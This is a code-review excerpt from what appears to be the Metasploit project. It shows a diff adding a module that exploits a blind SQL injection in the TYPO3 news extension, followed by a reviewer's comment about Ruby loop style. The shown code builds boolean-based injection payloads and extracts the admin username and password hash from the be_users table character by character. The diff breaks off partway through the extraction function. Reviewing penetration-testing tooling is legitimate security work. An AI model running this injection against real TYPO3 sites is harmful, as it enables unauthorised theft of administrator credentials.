modules/auxiliary/admin/http/typo3_news_module_sqli.rb

```diff
@@ -0,0 +1,201 @@
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Apr 6 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('ID', [true, 'The id of TYPO3 news page', '1']),
+        OptString.new('PATTERN1', [false, 'Pattern of the first article title', 'Article #1']),
+        OptString.new('PATTERN2', [false, 'Pattern of the second article title', 'Article #2'])
+      ])
+  end
+
+  def check
+    # the only way to test if the target is vuln
+    if test_injection
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def test_injection()
+    pattern1, pattern2 = try_autodetect_patterns
+    if pattern1 == '' or pattern2 == ''
+      print_error("Impossible to determine pattern automatically, aborting...")
+      return false
+    else
+      print_status("Testing injection...")
+      offset = 9
+      field = 'username'
+      table = 'be_users'
+      condition = 'uid=1'
+      digit_charset = "0".upto("9").to_a.join('')
+      patterns = {:pattern1 => pattern1, :pattern2 => pattern2}
+      size = blind_size(
+       "length(#{field})+#{offset}",
+       table,
+       condition,
+       2,
+       digit_charset,
+       patterns)
+      return size != ''
+    end
+  end
+
+  def dump_the_hash(patterns = {})
+    ascii_charset_lower = "a".upto("z").to_a.join('')
+    ascii_charset_upper = "A".upto("Z").to_a.join('')
+    ascii_charset = "#{ascii_charset_lower}#{ascii_charset_upper}"
+    digit_charset = "0".upto("9").to_a.join('')
+    full_charset = "#{ascii_charset_lower}#{ascii_charset_upper}#{digit_charset}$./"
+    username = blind('username','be_users', 'uid=1', ascii_charset, digit_charset, patterns)
+    print_good("Username: #{username}")
+    password = blind('password','be_users', 'uid=1', full_charset, digit_charset, patterns)
+    print_good("Password Hash: #{password}")
+  end
+
+  def blind(field, table, condition, charset, digit_charset, patterns = {})
+    # Adding 9 so that the result has two digits, If the lenght is superior to 100-9 it won't work
+    offset = 9
+    size = blind_size(
+     "length(#{field})+#{offset}",
+     table,
+     condition,
+     2,
+     digit_charset,
+     patterns
+    )
+    size = size.to_i - offset
+    data = blind_size(
+     field,
+     table,
+     condition,
+     size,
+     charset,
+     patterns
+    )
+    return data
+  end
+
+  def select_position(field, table, condition, position, char)
+    payload1 = "select(#{field})from(#{table})where(#{condition})"
+    payload2 = "ord(substring((#{payload1})from(#{position})for(1)))"
+    payload3 = "uid*(case((#{payload2})=#{char.ord})when(1)then(1)else(-1)end)"
+    return payload3
+  end
+
+  def blind_size(field, table, condition, size, charset,  patterns = {})
+    vprint_status("Retrieving field '#{field}' string (#{size} bytes) ...")
+    str = ""
+    for position in 0..size
```

Comment:
This runs once more than necessary, and `each` is preferred over `for X in Y`.

You can use `(1..size).each do |position|` here, then replace `position + 1` with `position` below.